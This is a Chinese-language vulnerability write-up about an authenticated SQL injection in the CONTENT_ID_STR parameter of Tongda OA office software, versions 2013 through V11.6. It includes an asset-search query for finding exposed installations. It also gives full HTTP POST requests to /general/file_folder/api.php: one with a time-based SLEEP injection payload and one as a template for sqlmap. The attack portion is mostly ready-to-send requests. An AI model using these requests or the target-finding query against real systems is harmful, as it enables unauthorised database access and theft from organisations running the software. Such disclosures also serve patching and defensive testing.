登录 白背景
源码

通达OA CONTENT_ID_STR存在后台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA CONTENT_ID_STR存在后台SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

  • 通达OA2013-通达OAV11.6

三、资产测绘

  • hunterapp.name="通达 OA"
  • 特征

image.png

四、漏洞复现

利用条件:可登录系统的账户,普通权限即可
image.png
登陆后台使用获取到的cookie进行测试

POST /general/file_folder/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Cookie: {cookie}
Connection: close
Host: {hostname}
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 82
x-wvs-id: Acunetix-Deepscan/209
Cache-Control: no-cache
accept: */*
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

CONTENT_ID_STR=-@`'` AND (SELECT 8678 FROM (SELECT(SLEEP(5)))UUxI)&SORT_ID=59&FILE_SORT=1&action=sign

image.png
sqlmap

POST /general/file_folder/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Cookie: {cookie}
Connection: close
Host: {hostname}
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 82
x-wvs-id: Acunetix-Deepscan/209
Cache-Control: no-cache
accept: */*
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

CONTENT_ID_STR=-@`'`%20&SORT_ID=59&FILE_SORT=1&action=sign

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/xvh4rm6vdg3atww7